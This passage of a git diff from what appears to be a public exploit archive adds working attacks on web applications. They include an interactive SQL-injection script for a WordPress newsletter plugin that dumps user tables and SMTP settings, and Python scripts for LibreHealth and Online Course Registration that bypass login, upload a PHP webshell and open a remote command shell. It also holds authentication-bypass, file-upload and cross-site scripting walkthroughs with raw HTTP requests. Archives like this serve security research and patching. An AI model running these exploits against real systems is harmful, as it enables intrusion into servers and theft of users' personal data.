')
+ print ('RHOST The target host IP address or domain.')
+ print ('RPORT The target host port number of the nodejs server.')
+
+if __name__ == '__main__':
+
+ # ensure we have at least an IP and Port
+ if len(sys.argv) < 3:
+ print_usage()
+ sys.exit(1)
+
+ print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
+ print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
+ file_creation(sys.argv[1], sys.argv[2])
\ No newline at end of file
diff --git a/exploits/php/webapps/48636.txt b/exploits/php/webapps/48636.txt
index 8dd2f6607..35326f319 100644
--- a/exploits/php/webapps/48636.txt
+++ b/exploits/php/webapps/48636.txt
@@ -7,18 +7,17 @@
1- Go to following url. >> http://(HOST)/cms/
2- Default username and password is admin:admin. We must know login credentials.
-3- Go "Filemanager" and press "Upload file" button.
-4- Choose your php webshell script and upload it.
-
-((Example PHP Web Shell Code))
-"; system($_GET['cmd']); ?>
+3- Go to "Filemanager" and press "Upload file" button.
+4- Choose your php web shell script and upload it.
+
+PHP Web Shell Code ==
5- You can find uploaded file there. >> http://(HOST)/media/(FILE-NAME).php
-6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=whoami
+6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=id
(( REQUEST ))
-GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1
+GET /media/(FILE-NAME).php?cmd=id HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
@@ -29,12 +28,13 @@ Connection: close
Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
Upgrade-Insecure-Requests: 1
+
(( RESPONSE ))
HTTP/1.1 200 OK
-Date: Fri, 03 Jul 2020 21:10:13 GMT
+Date: Fri, 06 Jul 2020 20:02:13 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 14
Connection: close
Content-Type: text/html; charset=UTF-8
-www-data
\ No newline at end of file
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
\ No newline at end of file
diff --git a/exploits/php/webapps/48690.txt b/exploits/php/webapps/48690.txt
new file mode 100644
index 000000000..03e214462
--- /dev/null
+++ b/exploits/php/webapps/48690.txt
@@ -0,0 +1,16 @@
+# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
+# Author: Balzabu
+# Discovery Date: 2020-07-23
+# Vendor Homepage: https://goautodial.org/
+# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
+# Tested Version: 4.0 (Last relase as of today)
+# Tested on OS: CentOS 7
+
+# STEPS TO REPRODUCE:
+
+# 1 - Log in as an agent
+# 2 - Write a new message to user goadmin with:
+Subject: Help me, I can't connect to the webphone
+Text: whatever you want
+# 3 - Send and wait for goadmin to read the message... :-)
\ No newline at end of file
diff --git a/exploits/php/webapps/48698.txt b/exploits/php/webapps/48698.txt
new file mode 100644
index 000000000..45f9a3207
--- /dev/null
+++ b/exploits/php/webapps/48698.txt
@@ -0,0 +1,40 @@
+# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
+# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
+# Date: 2020-07-20
+# Exploit Author: KBA@SOGETI_ESEC
+# Vendor Homepage: https://www.icegram.com/email-subscribers/
+# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
+# Version: <= 4.2.2
+# Tested on: Email Subscribers & Newsletters 4.2.2
+# CVE : CVE-2019-19985
+
+ ################################################################################################
+ # ___ ___ ___ ___ ___ #
+ # /\ \ /\ \ /\ \ /\ \ /\ \ ___ #
+ # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #
+ # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #
+ # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #
+ # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #
+ # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #
+ # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #
+ # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #
+ # \::/ / \::/ / \::/ / \:\__\ \/__/ #
+ # \/__/ \/__/ \/__/ \/__/ #
+ # ___ ___ ___ ___ #
+ # /\ \ /\ \ /\ \ /\ \ #
+ # /::\ \ /::\ \ /::\ \ /::\ \ #
+ # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #
+ # Email Subscribers & Newsletters <= 4.2.2 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #
+ # Unauthenticated File Download /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
+ # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #
+ # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #
+ # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #
+ # \:\__\ \::/ / \:\__\ \:\__\ #
+ # KBAZ \/__/ \/__/ \/__/ \/__/ #
+ # #
+ # #
+ ################################################################################################
+
+
+curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
+EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
\ No newline at end of file
diff --git a/exploits/php/webapps/48699.sh b/exploits/php/webapps/48699.sh
new file mode 100755
index 000000000..d85cd4f75
--- /dev/null
+++ b/exploits/php/webapps/48699.sh
@@ -0,0 +1,127 @@
+# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
+# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
+# Date: 2020-07-20
+# Exploit Author: KBAZ@SOGETI_ESEC
+# Vendor Homepage: https://www.icegram.com/email-subscribers/
+# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
+# Version: < 4.3.3
+# Tested on: Email Subscribers & Newsletters 4.2.2
+# CVE : CVE-2019-20361
+# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
+
+main () {
+ header
+ if [ "$#" -ne 1 ]; then
+ echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
+ echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
+ exit
+ fi
+
+ url=$1
+ echo ' Target URL : ' "$url"
+ echo ' Generating sqlmap tamper script in /tmp'
+ gen_sqlmap_tamper
+ sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
+ echo ' SQLMap base command : ' "$sqlmap_cmd"
+
+ while true
+ do
+ sleep 1
+ echo ''
+ echo " Possible choices: "
+ echo ''
+ echo " 0) Exit"
+ echo " 1) Simple vulnerability test SLEEP(5)"
+ echo " 2) Vulnerability test with SQLMap "
+ echo " 3) Get WP users data"
+ echo " 4) Get subscribers information"
+ echo " 5) Get 'Simple WP SMTP' settings"
+ echo ''
+ echo -n ' Choice number => '
+ read n
+
+ case $n in
+ 0) exit ;;
+ 1) echo 'Testing SLEEP(5)...'
+ { time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;;
+ 2) $sqlmap_cmd ;;
+ 3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
+ 4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
+ 5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
+ *) echo "Invalid option" ;;
+ esac
+ done
+
+}
+
+header () {
+
+echo ''
+echo ' ################################################################################################';
+echo ' # ___ ___ ___ ___ ___ #';
+echo ' # /\ \ /\ \ /\ \ /\ \ /\ \ ___ #';
+echo ' # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #';
+echo ' # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #';
+echo ' # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #';
+echo ' # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #';
+echo ' # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #';
+echo ' # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #';
+echo ' # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #';
+echo ' # \::/ / \::/ / \::/ / \:\__\ \/__/ #';
+echo ' # \/__/ \/__/ \/__/ \/__/ #';
+echo ' # ___ ___ ___ ___ #';
+echo ' # /\ \ /\ \ /\ \ /\ \ #';
+echo ' # /::\ \ /::\ \ /::\ \ /::\ \ #';
+echo ' # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #';
+echo ' # Email Subscribers & Newsletters < 4.3.1 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #';
+echo ' # Unauthenticated Blind SQL Injection /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
+echo ' # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #';
+echo ' # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #';
+echo ' # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #';
+echo ' # \:\__\ \::/ / \:\__\ \:\__\ #';
+echo ' # KBAZ \/__/ \/__/ \/__/ \/__/ #';
+echo ' # #';
+echo ' # #';
+echo ' ################################################################################################';
+echo ''
+}
+
+raw_commands () {
+
+ echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100" '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' | base64 -w 0
+
+ { time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'
+
+ sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
+
+ -T wp_users,wp_usermeta --dump
+ -T wp_ig_contacts --dump
+ --sql-query 'select * from wp_options where option_name="swpsmtp_options"'
+
+}
+
+gen_sqlmap_tamper () {
+
+ touch /tmp/__init__.py
+
+ cat << _END > /tmp/tamper_CVE-2019-1356989.py
+#!/usr/bin/env python
+
+import base64
+import urllib
+
+def tamper(payload, **kwargs):
+
+#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
+#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
+
+ param = '{"contact_id":"'
+ param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
+ param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
+
+ #print(param%payload)
+ return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
+_END
+}
+
+main $@
\ No newline at end of file
diff --git a/exploits/php/webapps/48702.txt b/exploits/php/webapps/48702.txt
new file mode 100644
index 000000000..b7e58d0dc
--- /dev/null
+++ b/exploits/php/webapps/48702.txt
@@ -0,0 +1,130 @@
+# Exploit Title: LibreHealth 2.0.0 - Authenticated Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Date: 2020-07-17
+# Vendor Homepage: https://librehealth.io/
+# Software Link: https://github.com/LibreHealthIO/lh-ehr
+# Version: 2.0.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Exploit Tested Using: Python 2.7.17
+# Vulnerability Description:
+# LibreHealth v2.0.0 suffers from an authenticated file upload vulnerability allowing
+# remote attackers to gain remote code execution (RCE) on the hosting webserver
+# via uploading a maliciously crafted image.
+
+import requests, sys, re
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
+F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
+B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
+S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
+info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' '
+err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' '
+ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' '
+
+def webshell(SERVER_URL, WEBSHELL_FILE, session):
+ try:
+ WEB_SHELL = SERVER_URL+'sites/default/profile_pictures/'+WEBSHELL_FILE
+ print(info+"Webshell URL: "+ WEB_SHELL)
+ getdir = {'telepathy': 'echo %CD%'}
+ r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
+ status = r2.status_code
+ if status != 200:
+ print(err+"Could not connect to the webshell.")
+ r2.raise_for_status()
+ print(ok+'Successfully connected to webshell.')
+ cwd = re.findall('[CDEF].*', r2.text)
+ cwd = cwd[0]+"> "
+ term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+ print(S[1]+F[2]+')'+F[4]+'+++++'+F[2]+'['+F[0]+'=========>'+S[0]+S[3]+' WELCOME BOKU '+S[0]+S[1]+'<========'+F[2]+']'+F[4]+'+++++'+F[2]+'('+F[0]+S[0])
+ while True:
+ thought = raw_input(term)
+ command = {'telepathy': thought}
+ r2 = requests.post(WEB_SHELL, data=command, verify=False)
+ status = r2.status_code
+ if status != 200:
+ r2.raise_for_status()
+ response2 = r2.text
+ print(response2)
+ except:
+ print('\r\n'+err+'Webshell session failed. Quitting.')
+ quit()
+
+def sig():
+ SIG = S[3]+F[4]+".-----.._ ,--.\n"
+ SIG += F[4]+"| .. > ___ | | .--.\n"
+ SIG += F[4]+"| |.' ,'-\" \"-. |/ /__ __\n"
+ SIG += F[4]+"| < "+F[2]+" * *"+F[4]+" \ / \\/ \\\n"
+ SIG += F[4]+"| |> )"+F[2]+" * * *"+F[4]+" / \\ \\\n"
+ SIG += F[4]+"|____..- '-."+F[2]+"*"+F[4]+"_"+F[2]+"*"+F[4]+".-'_|\\___|._..\\___\\\n"
+ SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
+ return SIG
+
+def formatHelp(STRING):
+ return S[3]+F[2]+STRING+S[0]
+
+def header():
+ head = S[3]+F[2]+'LibreHealth v2.0.0 - Authenticated Remote Code Execution (RCE)'+S[0]
+ return head
+
+if __name__ == "__main__":
+ print(header())
+ print(sig())
+#0 | Help
+ if len(sys.argv) != 4:
+ print formatHelp("(+) Usage:\t python %s " % sys.argv[0])
+ print formatHelp("(+) Example:\t python %s 'http://172.16.65.130/LibreEHR/' 'admin' 'admin'" % sys.argv[0])
+ sys.exit(-1)
+#1 | INIT
+ USERNAME = "admin"
+ PASSWORD = "admin"
+ SERVER_URL = 'http://172.16.65.130/LibreEHR/'
+ if not re.match(r".*/$", SERVER_URL):
+ SERVER_URL = SERVER_URL+'/'
+ LOGIN_URL = SERVER_URL+'interface/login/login.php'
+ LOGIN_POST = SERVER_URL+'interface/main/main_screen.php?auth=login&site=default'
+ UPLOAD_URL = SERVER_URL+'interface/new/new_comprehensive_save.php'
+#2 | Create Session
+ s = requests.Session()
+ get_session = s.get(LOGIN_URL, verify=False)
+ if get_session.status_code == 200:
+ print(ok+'Successfully connected to LibreHealth server & created session.')
+ print(info+"Session Cookie: "+get_session.headers['Set-Cookie'])
+ else:
+ print(err+'Cannot connect to the server and create a web session.')
+ login_data = {'new_login_session_management':'1', 'authProvider':'Default','authUser':USERNAME,'clearPass':PASSWORD,'languageChoice':'1'}
+ print(info+"Attempting to Login to LibreHealth with credentials: "+USERNAME+":"+PASSWORD)
+ auth = s.post(url=LOGIN_POST, data=login_data, verify=False, proxies=proxies)
+ loginchk = str(re.findall(r'Calendar', auth.text))
+ if loginchk == "[u'Calendar', u'Calendar']":
+ print(ok+"Login successful.")
+ else:
+ print(err+"Failed login. Check credentials.")
+#3 | File Upload
+ PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
+ png = {
+ 'profile_picture':
+ (
+ 'kaio-ken.php',
+ PNG_magicBytes+'\n'+'',
+ 'image/png',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+ fdata = {'form_cb_1':'upload','form_fname':'Sun','form_mname':'','form_lname':'Wukong','form_sex':'Male','form_status':'','form_facility':''}
+ print(info+"Exploiting avatar file upload vulnerability to upload a PHP webshell")
+ upload_avatar = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
+#4 | Get Webshell Upload Name
+ uploadchk = str(re.findall(r'demographics\.php\?set_pid=', upload_avatar.text))
+ if uploadchk == "[u'demographics.php?set_pid=']":
+ print(ok+"Successfully uploaded webshell")
+ else:
+ print(err+"Webshell upload failed.")
+ avatarFile = str(re.findall(r'demographics\.php\?set_pid=\d*\&', upload_avatar.text))
+ avatarFile = re.sub('^.*demographics\.php\?set_pid=', '', avatarFile)
+ avatarFile = re.sub('&.*$', '', avatarFile)
+ avatarFile = avatarFile+'.php'
+ print(info+"Webshell Filename: "+avatarFile)
+#5 | interact with webshell for Remote Command Execution
+ webshell(SERVER_URL, avatarFile, s)
\ No newline at end of file
diff --git a/exploits/php/webapps/48704.py b/exploits/php/webapps/48704.py
new file mode 100755
index 000000000..4222f3494
--- /dev/null
+++ b/exploits/php/webapps/48704.py
@@ -0,0 +1,113 @@
+# Exploit Title: Online Course Registration 1.0 - Unauthenticated Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Credit to BKpatron for similar Auth Bypass on admin page - exploit-db.com/exploits/48559
+# Date: 2020-07-15
+# Vendor Homepage: Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 | Python 2.7.18
+
+import requests, sys, urllib, re
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+ok = Fore.GREEN+'['+Fore.RESET+'+'+Fore.GREEN+']'+Fore.RESET+' '
+err = Fore.RED+'['+Fore.RESET+'!'+Fore.RED+']'+Fore.RESET+' '
+info = Fore.BLUE+'['+Fore.RESET+'-'+Fore.BLUE+']'+Fore.RESET+' '
+RS = Style.RESET_ALL
+FR = Fore.RESET
+YL = Fore.YELLOW
+RD = Fore.RED
+
+def webshell(SERVER_URL, session):
+ try:
+ WEB_SHELL = SERVER_URL+'studentphoto/kaio-ken.php'
+ getdir = {'telepathy': 'echo %CD%'}
+ r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
+ status = r2.status_code
+ if status != 200:
+ print(err+"Could not connect to the webshell.")
+ r2.raise_for_status()
+ print(ok+'Successfully connected to webshell.')
+ cwd = re.findall('[CDEF].*', r2.text)
+ cwd = cwd[0]+"> "
+ term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+ print(RD+')'+YL+'+++++'+RD+'['+FR+'=========>'+' WELCOME BOKU '+'<========'+RD+']'+YL+'+++++'+RD+'('+FR)
+ while True:
+ thought = raw_input(term)
+ command = {'telepathy': thought}
+ r2 = requests.get(WEB_SHELL, params=command, verify=False)
+ status = r2.status_code
+ if status != 200:
+ r2.raise_for_status()
+ response2 = r2.text
+ print(response2)
+ except:
+ print('\r\n'+err+'Webshell session failed. Quitting.')
+ quit()
+
+def formatHelp(STRING):
+ return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
+
+def header():
+ SIG = RD+' /\\\n'+RS
+ SIG += YL+'/vvvvvvvvvvvv '+RD+'\\'+FR+'--------------------------------------,\n'
+ SIG += YL+'`^^^^^^^^^^^^'+RD+' /'+FR+'============'+RD+'BOKU'+FR+'====================="\n'
+ SIG += RD+' \/'+RS+'\n'
+ return SIG
+
+if __name__ == "__main__":
+ print(header())
+ if len(sys.argv) != 2:
+ print(formatHelp("(+) Usage:\t python %s " % sys.argv[0]))
+ print(formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/Online Course Registration/'" % sys.argv[0]))
+ quit()
+ SERVER_URL = sys.argv[1]
+ if not re.match(r".*/$", SERVER_URL):
+ SERVER_URL = SERVER_URL+'/'
+ LOGIN_URL = SERVER_URL+'index.php'
+ PROFILE_URL = SERVER_URL+'my-profile.php'
+ print(info+'Creating session and saving PHPSESSID')
+ s = requests.Session()
+ get_session = s.get(SERVER_URL, verify=False)
+ if get_session.status_code == 200:
+ print(ok+'Successfully connected to server and created session.')
+ print(info+get_session.headers['Set-Cookie'])
+ else:
+ print(err+'Cannot connect to the server and create a web session.')
+ bypass_data = {'regno' : '\' or 1=1; -- boku', 'password' : '\' or 1=1; -- boku', 'submit' : ''}
+ print(info+'Bypassing authentication of student login portal.')
+ auth_bypass = s.post(url=LOGIN_URL, data=bypass_data, verify=False)
+ if auth_bypass.history:
+ for resp in auth_bypass.history:
+ print(info+'Response Status-Code: ' + str(resp.status_code))
+ print(info+'Location: ' + str(resp.headers['location']))
+ redirectURL = resp.headers['location']
+ if re.match(r".*change-password.php", redirectURL):
+ print(ok+'Successfully bypassed user portal authentication.')
+ else:
+ print(err+'Failed to bypass user portal authentication. Quitting.')
+ quit()
+ get_profile = s.get(url=PROFILE_URL, verify=False)
+ Name = str(re.findall(r'name="studentname" value=".*"', get_profile.text))
+ Name = re.sub('^.*name="studentname" value="', '', Name)
+ Name = re.sub('".*$', '', Name)
+ PinCode = str(re.findall(r'name="Pincode" readonly value=".*"', get_profile.text))
+ PinCode = re.sub('^.*name="Pincode" readonly value="', '', PinCode)
+ PinCode = re.sub('".*$', '', PinCode)
+ RegNo = str(re.findall(r'name="studentregno" value=".*"', get_profile.text))
+ RegNo = re.sub('^.*name="studentregno" value="', '', RegNo)
+ RegNo = re.sub('".*$', '', RegNo)
+ print(ok+'{studentname:'+Name+', Pincode:'+PinCode+', studentregno:'+RegNo+'}')
+ avatar_img = {
+ 'photo':
+ (
+ 'kaio-ken.php',
+ '',
+ 'image/png',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+ upld_data = {'studentname':Name, 'studentregno':RegNo,'Pincode':PinCode,'cgpa':'0.00','submit':''}
+ webshell_upload = s.post(url=PROFILE_URL, files=avatar_img, data=upld_data, verify=False)
+ print(ok+'Uploaded webshell. Now connecting via POST requests using telepathy.')
+ webshell(SERVER_URL, s)
\ No newline at end of file
diff --git a/exploits/php/webapps/48705.txt b/exploits/php/webapps/48705.txt
new file mode 100644
index 000000000..6def3b344
--- /dev/null
+++ b/exploits/php/webapps/48705.txt
@@ -0,0 +1,29 @@
+# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-07-14
+# Exploit Author: BKpatron
+# Vendor Homepage:https://elaniin.com/
+# Software Link:https://github.com/elaniin/CMS/archive/master.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/elaniin/login.php
+
+POST /elaniin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+Content-Length: 334
+Referer:http://localhost/elaniin/login.php
+Cookie: PHPSESSID=33snzxs8qht0gvh0fpd27vg62
+Connection: close
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
\ No newline at end of file
diff --git a/exploits/php/webapps/48706.txt b/exploits/php/webapps/48706.txt
new file mode 100644
index 000000000..aa2a1d5b8
--- /dev/null
+++ b/exploits/php/webapps/48706.txt
@@ -0,0 +1,76 @@
+# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
+# Date: 2020-07-15
+# Exploit Author: v1n1v131r4
+# Vendor Homepage: http://koken.me/
+# Software Link: https://www.softaculous.com/apps/cms/Koken
+# Version: 0.22.24
+# Tested on: Linux
+# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.md
+
+The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.
+
+Steps to exploit:
+
+1. Create a malicious PHP file with this content:
+
+
+
+2. Save as "image.php.jpg"
+
+3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.
+
+4. On Burp, rename your file to "image.php"
+
+
+POST /koken/api.php?/content HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://target.com/koken/admin/
+x-koken-auth: cookie
+Content-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551
+Content-Length: 1043
+Connection: close
+Cookie: PHPSESSID= [Cookie value here]
+
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="name"
+
+image.php
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="chunk"
+
+0
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="chunks"
+
+1
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="upload_session_start"
+
+1594831856
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="visibility"
+
+public
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="license"
+
+all
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="max_download"
+
+none
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="file"; filename="image.php"
+Content-Type: image/jpeg
+
+
+
+-----------------------------2391361183188899229525551--
+
+
+
+5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.
\ No newline at end of file
diff --git a/exploits/php/webapps/48707.txt b/exploits/php/webapps/48707.txt
new file mode 100644
index 000000000..4630d3270
--- /dev/null
+++ b/exploits/php/webapps/48707.txt
@@ -0,0 +1,118 @@
+# Exploit Title: PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
+# Date: 2020-07-01
+# Author: AppleBois
+# Version: 7xx ≤ 746
+# Homepage: https://pandorafms.org/
+# Software Link: https://sourceforge.net/projects/pandora/files/Pandora FMS 7.0NG/
+# CVE-2020-11749
+#
+# By asking network administrator to scan SNMP device to trigger Cross Site Scripting(XSS)
+# We can call a remote JavaScript file to execute arbitrary code to reach Remote Code Execution
+# on PandoraFMS.
+#
+######################################################################################
+
